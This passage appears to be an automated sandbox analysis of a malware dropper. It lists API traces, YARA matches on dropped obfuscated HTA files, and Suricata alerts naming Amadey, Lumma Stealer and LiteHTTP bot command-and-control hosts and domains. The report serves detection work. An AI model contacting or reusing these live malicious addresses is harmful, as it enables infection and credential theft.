Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0051BB70 OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,OPENSSL_sk_num,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_pop_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OPENSSL_sk_pop_free,ERR_new,ERR_set_debug,	27_2_00007FFE0051BB70
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1582 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,	27_2_00007FFE004A1582
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A155A ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,	27_2_00007FFE004A155A
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A5C9B CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_set_init,BIO_set_data,BIO_clear_flags,	27_2_00007FFE004A5C9B
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004B5CB0 COMP_zlib,OPENSSL_sk_new,COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,	27_2_00007FFE004B5CB0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1483 CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,	27_2_00007FFE004A1483
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A19E7 CRYPTO_free,	27_2_00007FFE004A19E7
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1CEE CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse,	27_2_00007FFE004A1CEE
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004C5D20 CRYPTO_free,CRYPTO_free,	27_2_00007FFE004C5D20
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE00503D20 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,	27_2_00007FFE00503D20
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A23F1 CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,	27_2_00007FFE004A23F1
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004B3CC0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,	27_2_00007FFE004B3CC0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A2595 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,	27_2_00007FFE004A2595
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1D89 CRYPTO_free,CRYPTO_memdup,	27_2_00007FFE004A1D89
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0050BE20 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,	27_2_00007FFE0050BE20
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004C5E10 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,	27_2_00007FFE004C5E10
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A108C ERR_new,ERR_set_debug,CRYPTO_free,	27_2_00007FFE004A108C
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A2310 ERR_new,ERR_set_debug,_time64,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free,	27_2_00007FFE004A2310
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A3EB0 CRYPTO_free,	27_2_00007FFE004A3EB0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A107D CRYPTO_free,	27_2_00007FFE004A107D
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A150F OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_VERIFY_PARAM_get_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,	27_2_00007FFE004A150F
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A2720 CRYPTO_free,CRYPTO_strdup,	27_2_00007FFE004A2720
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A25DB CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,	27_2_00007FFE004A25DB
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004BBF30 CRYPTO_memcmp,	27_2_00007FFE004BBF30
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE00503F30 ERR_new,ERR_set_debug,X509_get0_pubkey,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,EVP_PKEY_encrypt_init,RAND_bytes_ex,EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,	27_2_00007FFE00503F30
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004B5F20 CRYPTO_THREAD_run_once,	27_2_00007FFE004B5F20
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1C53 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,	27_2_00007FFE004A1C53
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A2680 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,	27_2_00007FFE004A2680
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A5EE0 BIO_get_data,BIO_get_shutdown,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,	27_2_00007FFE004A5EE0
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004ADFB5 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,	27_2_00007FFE004ADFB5
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE0050DF40 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,	27_2_00007FFE0050DF40
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1B18 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_memcmp,ERR_new,ERR_new,	27_2_00007FFE004A1B18
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004C6030 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,d2i_X509,X509_get0_pubkey,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,	27_2_00007FFE004C6030
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A202C CRYPTO_free,	27_2_00007FFE004A202C
Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe	Code function: 27_2_00007FFE004A1019 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,	27_2_00007FFE004A1019

Phishing

Yara detected obfuscated html page

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\SyboFREGa.hta, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\YxELYhqVP.hta, type: DROPPED
Source: Yara match	File source: C:\Temp\4LrdSfC7c.hta, type: DROPPED

Source: 5c9465cda4.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\10104900101\ce4pMzk.exe

File created: C:\Users\user\AppData\Roaming\Local\Caches\installed.txt

Source: unknown	HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.4:49941 version: TLS 1.2

Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB10A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-312\Release\pythoncom.pdb}},GCTL source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2569114412.00007FFE1A543000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AAA77000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2569114412.00007FFE1A543000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-312\Release\pywintypes.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-312\Release\pywintypes.pdb** source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Badus\OneDrive\Desktop\DLLInjector\DllExecutorApp\DllExecutorApp\obj\Debug\Anubis.pdb source: ce4pMzk.exe, 0000001C.00000000.2468317844.0000021039BD2000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2567650557.00007FFE1A503000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-312\Release\pythoncom.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB389000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: chromium.exe, 0000001B.00000002.2563305426.00007FFE12261000.00000002.00000001.01000000.00000025.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: chromium.exe, 0000001B.00000002.2563783574.00007FFE126E7000.00000002.00000001.01000000.0000001D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2562381276.00007FFE11EBC000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.9\Bot\LiteHTTP\obj\x86\Debug\Anubis.pdb@ source: ce4pMzk.exe, 0000001C.00000000.2468317844.0000021039BD2000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2565474639.00007FFE13303000.00000002.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2562381276.00007FFE11EBC000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: chromium.exe, 0000001B.00000002.2563564294.00007FFE126CE000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.9\Bot\LiteHTTP\obj\x86\Debug\Anubis.pdb source: ce4pMzk.exe, 0000001C.00000000.2468317844.0000021039BD2000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-312\Release\win32api.pdb!! source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *.pdb source: powershell.exe, 00000008.00000002.1818275027.000001F33A157000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-312\Release\win32api.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp, chromium.exe, 0000001B.00000002.2568191876.00007FFE1A519000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdb source: powershell.exe, 00000008.00000002.1811545878.000001F339E20000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python3.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AB6F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AAC88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SvhQA35.exe, 00000018.00000003.2441096547.00000235AA663000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00ADDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00ADDBBE
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AE68EE FindFirstFileW,FindClose,	0_2_00AE68EE
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AE698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_00AE698F
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00ADD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00ADD076
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00ADD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00ADD3A9
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AE9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00AE9642
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AE979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00AE979D
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AE9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00AE9B2B
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AE5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00AE5C97

Source: C:\Users\user\AppData\Local\Temp\onefile_7896_133856820214566652\chromium.exe

Code function: 27_2_00007FFE0E172E70 memset,PyList_New,SetErrorMode,PyArg_ParseTuple,PyObject_IsTrue,PyEval_SaveThread,GetLogicalDriveStringsA,PyEval_RestoreThread,PyErr_SetFromWindowsErr,SetErrorMode,PyEval_SaveThread,GetDriveTypeA,PyEval_RestoreThread,GetVolumeInformationA,strcat_s,SetLastError,strcat_s,strcat_s,strcat_s,FindFirstVolumeMountPointA,strcpy_s,strcat_s,Py_BuildValue,PyList_Append,_Py_Dealloc,FindNextVolumeMountPointA,FindVolumeMountPointClose,strcat_s,strcat_s,Py_BuildValue,PyList_Append,_Py_Dealloc,strchr,SetErrorMode,FindVolumeMountPointClose,SetErrorMode,_Py_Dealloc,_Py_Dealloc,

27_2_00007FFE0E172E70

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49739 -> 176.113.115.6:80
Source: Network traffic	Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 176.113.115.7:80 -> 192.168.2.4:49798
Source: Network traffic	Suricata IDS: 2060385 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (exarthynature .run) : 192.168.2.4:54485 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.4:49856 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.4:49863 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.4:49877 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:49880 -> 185.208.156.162:80
Source: Network traffic	Suricata IDS: 2060386 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (exarthynature .run in TLS SNI) : 192.168.2.4:49888 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:49880 -> 185.208.156.162:80
Source: Network traffic	Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:49880 -> 185.208.156.162:80
Source: Network traffic	Suricata IDS: 2060420 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (starrynsightsky .icu) : 192.168.2.4:60009 -> 1.1.1.1:53
